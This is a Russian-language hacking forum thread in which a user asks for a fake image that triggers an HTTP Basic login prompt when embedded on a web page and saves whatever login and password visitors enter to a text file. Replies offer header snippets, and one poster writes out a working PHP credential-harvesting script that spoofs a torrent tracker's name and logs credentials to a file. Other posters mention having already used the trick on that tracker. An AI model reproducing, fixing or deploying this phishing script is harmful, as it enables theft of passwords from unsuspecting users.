Помню был такой прикол - GIF авторизация и когда вставлял то выходила авторизация, и записывалось в лог... Кто может помочь найти?
но мне нужен тот с фейком, который записывает пароли в .тхт... был бы оч рад если кто поможет, нужно срочно.. Помню был видео урок с ним, а уже удалили видео.античат.ру
мне кажется это какие-то странные попытки описать php сниффер.. держи.. http://web-defence.ru/snif/ как вариант =)
PHP: header('WWW-Authenticate: Basic realm="Password Protected Area"'); header('Authorization: Basic'); логирование сам прикрути, 30 секунд
ВЫ не очень поняли наверно. В общем была статья, что с тегом можно было бы подставить картинку, и когда юзер заходит то выходит авторизация, и он вводит логин и пароль и они записываются в pass.txt к примеру. И чтобы при заходе на smile.gif открывался пхп авторизация вот ))
через .htaccess may bye.. Code: <? header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { *$login = $_SERVER['PHP_AUTH_USER']; *$pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) *{ * Header('HTTP/1.1 401 Unauthorized'); * Header('WWW-Authenticate: Basic realm="TORRENTSMD.COM"'); *} *elseif($login) *{ setcookie('LOGON',md5($pass)); $f = fopen('kizda.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); *} } imagegif($image); imagedestroy($image); ?> ВОт написал, но гдето ошибка, вернее в 6 линии, не пойму что не то
омг, ты с молдовы =\ я уже выжал трекер, врядле опять кто-то поведётся и ещё тебя по IP пицданут, такчо потом не ной нед, он хочет файл с basic авторизацией и вставлять его в чоб на паге вылетала авторизация, а пассы писать в файл [QUOTE=SoftLive]через .htaccess may bye..[/QUOTE] "may bye" = "май прощай"
Ponchik, земля))) Да мне не только для ТМД)) Был бы рад если бы поделился правильным скриптаком, подкинул бы лавешки, да сейчас всё снял уже.. подкину плюсов
В молдове чуть более, чем все незнаю что такое вебмани Ну ёпрст, если ты нуб в этом всём хоть не позорься млять! с маем он просчается, плюсы ставить собирается только цветные могут ставить плюсы тебе скрипт дали (точнее ты его сам нащёл) ну и всё, не позорься, школота это не есть гуд
и в этом есть правда... Правда он не работает, был бы очень рад если бы помог, просто только плюсами то и могу помочь